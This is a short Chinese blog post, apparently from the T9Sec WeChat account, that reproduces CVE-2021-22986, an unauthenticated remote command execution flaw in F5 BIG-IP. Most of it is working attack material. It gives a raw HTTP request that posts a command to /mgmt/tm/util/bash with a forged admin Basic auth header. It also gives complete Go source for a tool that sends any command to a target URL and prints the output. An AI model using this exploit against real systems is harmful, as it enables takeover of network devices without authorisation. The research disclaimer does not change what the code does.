复现
数据包如下:
POST /mgmt/tm/util/bash HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Accept: */*
Connection: close
Authorization: Basic YWRtaW46
X-F5-Auth-Token:
Content-Length: 46
Content-Type: application/json
{"command": "run", "utilCmdArgs": "-c id"}
工具
使用 go 简单写一下,代码有点 low
下载地址:https://github.com/yuyan-sec/Poc-Project/tree/main/F5
相关代码:
package mainimport ("fmt""net/http""io/ioutil""crypto/tls""time""bytes""regexp""strings""flag")func main(){var host,cmd stringflag.StringVar(&host,"u","","URL: http://127.0.0.1")flag.StringVar(&cmd,"c","","CMD: id")flag.Parse()if host == "" || cmd == ""{fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝CVE-2021-22986 Author: @yuyan-sec`)}else{exp(host,cmd)}}func exp(url, cmd string){t := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true},}c := &http.Client{Transport: t,Timeout: 5 * time.Second,}url = strings.TrimRight(url,"/")url = url + "/mgmt/tm/util/bash"payload := []byte("{"command": "run", "utilCmdArgs": "-c "+ cmd +""}")r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload))r.Header.Set("Content-Type", "application/json")r.Header.Set("X-F5-Auth-Token", "")r.Header.Set("Authorization", "Basic YWRtaW46")resp, err := c.Do(r)if err != nil{return}defer resp.Body.Close()body, err := ioutil.ReadAll(resp.Body)if err != nil{return}if resp.StatusCode == 200{reg := regexp.MustCompile(`"commandResult":"(.*?)\n`)commandResult := reg.FindAllStringSubmatch(string(body),-1)result := commandResult[0][1]result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1)fmt.Println(result)}else{fmt.Println("fail")}}
本文始发于微信公众号(T9Sec):CVE-2021-22986 复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论